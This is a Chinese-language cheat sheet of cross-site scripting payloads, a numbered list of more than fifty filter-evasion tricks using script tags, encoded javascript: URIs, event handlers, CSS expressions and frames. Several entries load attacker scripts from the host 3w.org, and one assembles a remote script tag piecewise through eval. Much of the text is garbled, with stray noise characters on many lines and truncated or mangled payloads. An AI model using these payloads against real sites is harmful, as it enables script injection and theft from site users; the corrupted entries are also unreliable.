XSS攻击汇总

admin

(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- m' H% Z1 B5 z: W3 X- X(99)另类弹框
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
+ E$ A+ M5 t8 R0 U' |<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 x+ q8 G- ^: \, }6 p; o$ C  i
(3)IMG标签无分号无引号
" w* `# z  Z" z9 N, Q: w<IMG SRC=javascript:alert(‘XSS’)>

5 u8 @; a2 g2 `* b: Z(4)IMG标签大小写不敏感
! o) P; \7 \: t: H6 i<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

4 u. k+ `8 Z$ n; W& g* e. a(5)HTML编码(必须有分号)
1 l. U( I- m/ R" ~<IMG SRC=javascript:alert(“XSS”)>
# p9 V* b+ t; ?) }
(6)修正缺陷IMG标签
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
* [' f5 [# n# F
(7)formCharCode标签(计算器)
  a% K& x$ `% x! E<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
/ b" [  {( X  y& ]6 g  a
(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S')>
0 V" C- m& N' C
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>
" z7 L2 H$ b  x7 v" z4 t+ C
(10)十六进制编码也是没有分号(计算器)
<IMG SRC=\'#\'" /span>

(11)嵌入式标签,将Javascript分开
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
# j8 \' j. {7 c5 m; f2 N+ r  e
6 z: R6 t# P6 M! k3 s! S% _3 H, w(12)嵌入式编码标签,将Javascript分开
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
6 w9 ?5 t4 s7 D" f: [* S7 U
(13)嵌入式换行符
; Z! \( C4 y, m/ \<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>

(14)嵌入式回车
" M! D2 y, p; a" ]2 u! w<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
# w; C" G6 X. m1 y" ^) p
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
$ E* _& ^' \/ b<IMG SRC=\'#\'" /span>

/ }. m1 Z* C2 ?* v) U1 c; c(16)解决限制字符(要求同页面)
6 ?9 }5 p: e4 k$ o0 a* j5 \  X<script>z=’document.’</script>
<script>z=z+’write(“‘</script>
9 G! e9 \3 r' J" M<script>z=z+’<script’</script>
! h( C0 Y( N! M( G7 @1 ]( b4 d<script>z=z+’ src=ht’</script>
$ F: m) R' _( r6 Y7 w1 j- \<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
  }0 K8 d& N, y$ F8 Z) n- E<script>z=z+’.net/1.’</script>
% v! M' C: k  w8 ]( B<script>z=z+’js></sc’</script>
<script>z=z+’ript>”)’</script>
<script>eval_r(z)</script>

: O& G" K  C0 j* ?; D  m(17)空字符
: s$ s* J& Z( h0 K# |  q1 `  N" Rperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
# Z$ ]4 P- Y4 {! e
( W, c  p0 z. q+ q, n5 D(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
  T8 S7 U& S) |% wperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
7 T' L& p) J+ n
1 R, V. T( T; ?- Z! V) }5 Z1 \. d(19)Spaces和meta前的IMG标签
3 b3 P& Z2 R( M. N<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>

(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
: H1 J9 B  ^4 T
(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
) G1 }2 |1 l  c2 M6 `& E! m9 Z
(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>

! N7 O. s7 Y9 J9 t) e4 ]- O(23)双开括号
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
. e8 K' w& D6 ^- Z
" u/ s/ B% b$ q+ R! P(24)无结束脚本标记(仅火狐等浏览器)
& Y' |( H- ~% H0 ?, \) T<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
2 @- M  C3 S8 H! F( f" q, f  Q! o2 _
(25)无结束脚本标记2
<SCRIPT SRC=//3w.org/XSS/xss.js>

' C. W8 H5 k( r; U9 {(26)半开的HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

! c2 E$ R/ \$ v7 r6 }- N2 U(27)双开角括号
* r$ J1 D7 y: ~# O( X0 m<iframe src=http://3w.org/XSS.html <
( X9 a: z9 W5 B- [3 r* A6 K8 o
(28)无单引号 双引号 分号
<SCRIPT>a=/XSS/
. P6 ^) z; b! y2 X2 E0 ^( V/ Aalert(a.source)</SCRIPT>

" m  [: U, ^$ G(29)换码过滤的JavaScript
\”;alert(‘XSS’);//

6 K5 d6 D1 |. f(30)结束Title标签
5 }% r3 c8 G  j. ^0 B& P; v</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>

(31)Input Image
4 Y/ M& i( ?- H8 P4 e<INPUT SRC=\'#\'" /span>
9 S- W2 z: H. W1 }
(32)BODY Image
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

(33)BODY标签
<BODY(‘XSS’)>
/ |6 |! L$ B+ q+ Q( g
(34)IMG Dynsrc
3 d% z8 J8 B8 |: F<IMG DYNSRC=\'#\'" /span>
/ ^8 o( S4 A8 l6 b
(35)IMG Lowsrc
5 {) g. H! N2 F. r' h; U( r* m<IMG LOWSRC=\'#\'" /span>
0 `/ b, q% f6 d
(36)BGSOUND
3 c1 q' O" P( J+ H& n<BGSOUND SRC=\'#\'" /span>
& e* L* ~" t! u* P- f
(37)STYLE sheet
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>

9 _5 x  H* H4 D(38)远程样式表
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>

(39)List-style-image(列表式)
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
# u: L( b, n) E) R( G5 x8 N. h
/ R# {2 |$ _0 z6 i3 F& P(40)IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

6 `6 w2 |/ j4 g3 {(41)META链接url
! k3 D; [5 u: }; C' z+ _  g<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>

0 x9 Q. [( E( I2 C- |(42)Iframe
, @+ o% ]1 z6 R- U0 [<IFRAME SRC=\'#\'" /IFRAME>

(43)Frame
+ e- q7 U2 N; V2 M- F; C<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44)Table
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>

; r- A; a0 a5 E7 `! ]' G(45)TD
1 d5 g9 p  B( A0 u4 d( r2 S" K<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>

(46)DIV background-image
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
2 D6 b' I2 _, ^5 g; |$ k& X) E
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
+ }# K  k1 J# k6 H; `2 W+ g% |<DIV STYLE=”background-image: url(
javascript:alert(‘XSS’))”>

(48)DIV expression
- y% d  S$ v- z! {$ c, K" Z' c<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
6 L" h; i5 I; h) b. J+ G5 }
( v5 y9 i+ x9 h: E(49)STYLE属性分拆表达
6 _) r. ^& x/ M<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
7 N4 ]& ~0 }( ]1 g  K
(50)匿名STYLE(组成:开角号和一个字母开头)
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
5 m% M% b0 U0 }
2 i# n0 z7 @8 h& A(51)STYLE background-image
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>

(52)IMG STYLE方式
exppression(alert(“XSS”))’>
$ q* O: R/ {! Y8 [4 |; h
; B8 n: v+ R; s% g3 J& x(53)STYLE background
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
1 o$ w% P2 W; f. q' S5 I% Q% x
(54)BASE
<BASE HREF=”javascript:alert(‘XSS’);//”>

& b9 [2 c" v6 C5 F  _3 K(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
# J; s! q- E5 z